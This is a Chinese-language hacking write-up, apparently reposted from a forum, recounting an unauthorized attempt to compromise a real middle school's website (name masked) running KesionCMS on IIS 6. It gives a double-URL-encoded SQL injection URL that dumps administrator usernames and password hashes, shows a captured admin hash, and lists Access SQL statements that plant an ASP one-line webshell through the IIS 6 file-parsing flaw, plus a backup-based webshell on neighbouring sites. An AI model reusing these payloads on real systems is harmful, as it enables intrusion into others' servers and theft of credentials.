起因很简单咋QQ邮箱的订阅里收到了此消息

clip_image002

00后白富美啊```让咱这90后没有对象的屌丝情何以堪```

打开后看到了她们学校

clip_image004

XX实验学校…(我们是本着学习的态度,全程打码。)

百度之``

网站是www.****.cn

clip_image006

clip_image008

IIS/6.0

网站生成的是静态页面…

后台我们看下….

clip_image010

后台是某CMS改的…那这个CMS是什么哪???

这个是科讯的CMS…我们我知道呐???因为

clip_image012在网站后台添加8就出现了本来面目```

我们知道了是科讯的那我们就更好的去利用

百度科讯漏洞

乌云提交的漏洞

哈哈RP

提交时间: 2012-05-22

公开时间: 2012-07-06

具体的你们去乌云网站看http://www.wooyun.org/bugs/wooyun-2010-07419

注入语句:%') union select 1,2,username+'|'+ password from KS_Admin
转换如下:
/plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500

这段代码你可以得到管理帐号和密

这个有说明怎么转码,但是有些人估计还是不懂怎么转码的吧….

clip_image014

其实这个是二次转码

第一次转码

clip_image016

Union转码后%75%6E%69%6F%6E

第二次转码

clip_image018

二次转码我们是通过 gb2313的 URLENconde 编码

%75%6E%69%6F%6E转码后%2575%256E%2569%256F%256E

这样大家应该懂了如何来回转换的吧~

那麽我们现在有了帐号密码 但是我们没有认证码

<option value='1|2'>admin|8ae2232b1cd2bd90</option>

认证码是保存在Conn.asp这个文件里面

我们要知道这个文件才可以

clip_image020

也就是说拥有了帐号密码还是不可以的

----------------------------------------------------------------------------------------

网站关闭了注册 注册是不行了

有个BBS bbs禁止注册

有BBS后台

By Dvbbs.net

动网的论坛…

啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊

管理员还做了限制那就是防下载 .mdb后缀名

clip_image022

看来管理员管理意识了得啊…

主站希望好渺茫啊````

还记得刚刚我们找到的一个地址吗

clip_image023

为什么没有想到从这个地方下手

笨蛋

clip_image025

全部默认 你们懂的

clip_image027

看看我们看到了什么…

我们进去了

现在就是拿shell了

直接上大马是没有戏的

因为这个服务器上的站全部智创 你们懂得智创厉害

8.0 拿shell是sql执行语句

正常情况下是

执行代码:
1.create table cmd (a varchar(50))
2.insert into cmd (a) values (‘<%execute request(chr(35))%>’)
3.select * into [a] in ’D:\wwwroot\M3loee.asa;.xls’ ’excel 4.0;’ from cmd;
4.drop table cmd;
解释下:
1.create table cmd (a varchar(50)) 建立一个有一个a字段的表 表名为cmd字段类型为字符 长度为50
2.insert into cmd (a) values (‘<%execute request(chr(35))%>’) 在表cmd的a字段插入密码为#的一句话木马
3.select * into [a] in ’D:\wwwroot\M3loee.asa;.xls’ ’excel 4.0;’ from cmd 把表cmd的内容导出为物理路径的一个excel文件,为什么用excel文件,因为ACCESS数据库不允许导出其他危险格式。我们导出为excel后在利用IIS解析漏洞就可以变成我们的小马了。
4.drop table cmd 删表

但是执行到第三句…问题有了

这一路我们是死了

clip_image029

还有一个是更简单的

SELECT '<%execute request("a")%>' into [0ldgui] in 'D:\wwwroot\****\wwwroot\8+1.asp(1.asp)' 'excel 8.0;' from 0ldgui

clip_image031

怎么执行都是下面这个 数据库只读

错误号

来源

描述

帮助

帮助文档

-2147217911

不能更新。数据库或对象为只读。

Microsoft JET Database Engine

5003027

 

看来在后台拿shell是不行了

即使我们拿到了目标站的认证码估计后台也拿不到shell

旁注也没法提权

主数据库完整路径为: D:\wwwroot\***\wwwroot\8\KS_Data\KesionCMS8.mdb
采集数据库完整路径为:D:\wwwroot\***\wwwroot\KS_Data\Collect\KS_Collect.Mdb

90sec大牛出了个科讯漏洞应该是可以利用的

但是本机没有安装PHP环境

我们只好旁注…

clip_image033

134个站,搞下来一个就有希望了….

后台拿到shell 在这里说下过程

后台是有备份的地方 但是有一点那就是没有上传

没有上传的图片我怎么拿的

clip_image035

看到没 数据库竟然是asp

我们是在后台添加加密一句话

clip_image037然后备份网站

clip_image039

这样就拿到了

但是网站权限很死,没有法子

网站安装有智创没有法子上传大马

上传大马提示防火墙拦截

旁注是死了

网站数据权限是只读,猜测我们及时拿到了认证码也不好拿到shell

还有在论坛发过一个问题帖子就是管与这个站的

对于这个站的限制我在问题帖子里面都说明了

https://forum.90sec.org/thread-3878-1-4.html

源链接

Hacking more

...